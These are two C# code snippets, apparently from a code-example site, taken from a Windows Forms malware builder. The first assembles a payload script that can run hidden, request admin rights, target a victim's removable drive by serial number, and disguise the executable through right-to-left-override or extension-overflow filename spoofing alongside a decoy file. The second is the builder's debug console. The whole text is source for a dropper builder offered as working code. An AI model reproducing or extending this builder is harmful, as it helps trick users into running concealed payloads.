示例#1
0
        /*
         * Start Build Function - a function that generates the payload script with the corresponding options provided by the user. (Pre-Build Stage)
         * --------------------------------------------------------------------------------------------------------------------------------------------
         * stratBuild(
         *      Is in write mode (bool)
         *      Skip pre-build process (bool)
         * )
         * --------------------------------------------------------------------------------------------------------------------------------------------
         * returns: nothing
         */
        private void startBuild(bool isWriteMode = false, bool skipprebuild = false)
        {
            if (skipprebuild == false)
            {
                ismodified = false;
                dbgmsg("Starting build...");
                dbgmsg("Importing template...");

                templateData = File.ReadAllText("payloadTemplate.txt");

                if (payloadMode != 2)
                {
                    dbgmsg("Importing payload...");
                    if (File.Exists("$payloadtmp"))
                    {
                        File.Delete("$payloadtmp");
                    }
                    File.Copy(payloadFile[payloadMode], "$payloadtmp");
                }

                dbgmsg("Importing spoofed file...");
                if (File.Exists("$spooftmp"))
                {
                    File.SetAttributes("$spooftmp", FileAttributes.Normal);
                    File.Delete("$spooftmp");
                }
                File.Copy(ofdSpoof.FileName, "$spooftmp");

                /*
                 * scriptData Array String Variable - Stores the temporary data to be written in the script through String.Format
                 * ---------------------------------------------------------------------------------------------------------------
                 * Index Representation Values
                 *   0  - #RequireAdmin pre-processor
                 *   1  - Payload arguments placeholder (string)
                 *   2  - Execute through console (bool)
                 *   3  - Stream console output to a text file (bool)
                 *   4  - Execute in victims' drive (bool)
                 *   5  - Payload name (string)
                 *   6  - Spoofed File name (string)
                 *   7  - Hide/Show Payload Window (Macro | @SW_SHOW / @SW_HIDE)
                 *   8  - Console command execution switch (String | /k or /c)
                 *   9  - Type of payload (integer | 0 = payload / 2 = dll payload / 3 = shell code)
                 *   10 - Driver Serial Check (bool)
                 *   11 - Driver Serial to Check (String)
                 */

                dbgmsg("Writing parsed script to memory...");
                templateData = String.Format(
                    templateData,

                    (chkAdminFlag.Checked ? "#RequireAdmin" : null),
                    ((payloadMode != 2) ? (chkArguments.Checked ? parseEscapeQuotes(tbArguments.Text) : null) : parseEscapeQuotes(tbPayload.Text)),
                    ((payloadMode == 0 && chkConsole.Checked) ? "true" : "false"),
                    ((payloadMode == 0 && chkConsole.Checked && chkStreamConsole.Checked) ? "true" : "false"),
                    ((payloadMode == 0 && chkTarExe.Checked) ? "true" : "false"),
                    ((payloadMode != 2) ? tbPayload.Text : null),
                    tbSpoof.Text,
                    (chkHidWin.Checked ? "@SW_HIDE" : "@SW_SHOW"),
                    ((payloadMode == 0 && chkConsole.Checked) ? btnCommand.Text : ""),
                    payloadMode.ToString(),
                    (chkSerial.Checked && excomp[2] ? "true" : "false"),
                    (chkSerial.Checked && excomp[2] ? getSerial(drpDrives.GetItemText(drpDrives.SelectedItem)) : "0000000000")

                    );

                if (payloadMode == 2)
                {
                    dbgmsg("Creating Payload placeholder...");
                    if (File.Exists("$payloadtmp"))
                    {
                        File.Delete("$payloadtmp");
                    }
                    File.Create("$payloadtmp").Close();
                }
            }

            if (isWriteMode)
            {
                openminipad(templateData, true);
            }
            else
            {
                using (buildPayload _bp = new buildPayload()) {
                    if (radOverflow.Checked)
                    {
                        _bp.overflowCount = overflowCount;
                    }

                    if (radNone.Checked)
                    {
                        _bp.spoofMode = 0;
                    }
                    else if (radOverflow.Checked)
                    {
                        _bp.spoofMode = 1;
                    }
                    else if (radRTLO.Checked)
                    {
                        _bp.spoofMode = 2;
                    }
                    string[] _tmp = trimext(tbSpoof.Text);
                    _bp.tbFlNm.Text  = _tmp[0];
                    _bp.tbFkExt.Text = _tmp[1];
                    _bp.script       = templateData;
                    _bp.drive        = drpDrives.GetItemText(drpDrives.SelectedItem);
                    _bp.isicon       = isicon;
                    _bp.upx          = excomp[1];
                    _bp.ShowDialog();
                }
            }
        }
示例#2
0
        private void btnConsole_Click(object sender, EventArgs e)
        {
            string[] con = tbConsole.Text.Split(' ');
            switch ((con[0]).ToLower())
            {
            case "setdrive":
                drpDrives.Items.Add(con[1]);
                drpDrives.SelectedIndex = drpDrives.Items.Count - 1;
                dbgmsg("Override command -- Drive selection set and added -- " + con[1]);
                break;

            case "exit":
                Application.Exit();
                break;

            case "setoverflowcount":
                overflowCount = Convert.ToInt32(con[1]);
                dbgmsg("Overflow loop count changed to " + con[1]);
                break;

            case "setimagelocation":
                imgFileIcon.ImageLocation = con[1];
                dbgmsg("Image location set : " + con[1]);
                break;

            case "cls":
                dbgRtb.Text = "";
                break;

            case "overflowdebugmsg":
                dbgmsg("The quick brown fox jumps over the lazy dog The quick brown fox jumps over the lazy dog The quick brown fox jumps over the lazy dog The quick brown fox jumps over the lazy dog");
                break;

            case "showpayloadfile":
                dbgmsg("payloadFile[0]=" + payloadFile[0]);
                dbgmsg("payloadFile[1]=" + payloadFile[1]);
                break;

            case "checkcomp":     //Check the function documentation of "checkComponent" to know the debug arguments/parameters
                dbgmsg("Testing checkComponent() Function");
                dbgmsg("Test returned a value of: " + checkComponent(con[1], con[2], con[3], con[4], con[5]).ToString());
                break;

            case "teststrformat":
                dbgmsg("strformat:" + String.Format(con[1], con[2]));
                break;

            case "formsetwidth":
                dbgmsg("Form width set to: " + con[1]);
                this.Width = Convert.ToInt32(con[1]);
                break;

            case "cleanup":
                cleanup();
                break;

            case "showallui":
                dbgmsg("showing all ui...");
                about        _a = new about();
                buildPayload _b = new buildPayload();
                minipad      _c = new minipad();
                _a.Show();
                _b.Show();
                _c.Show();
                break;

            case "rtlo":
                dbgmsg(globalClass.rtlo + con[1]);
                break;

            case "getserial":
                dbgmsg("driveserial: " + getSerial(con[1]));
                break;

            case "testnet":
                dbgmsg("result:" + testNet(con[1]));
                break;

            case "rep":
                dbgmsg("result: " + con[1].Replace("\"", "\"\""));
                break;

            default:
                dbgmsg("Bad command! Available commands:\nsetdrive [driveletter]\nsetoverflowcount [integer]\nsetimagelocation [filepath]\nshowpayloadfile\noverflowdebugmsg\ncheckcomp [name] [filename] [size] [link] [desc]\nteststrformat [string] [data]\nformsetwidth [integer]\ncleanup\nshowallui\nrtlo [string]\ngetserial [drive]\ntestnet [address]\nrep [string]\ncls\nexit\n");
                break;
            }
            tbConsole.Text = "";
        }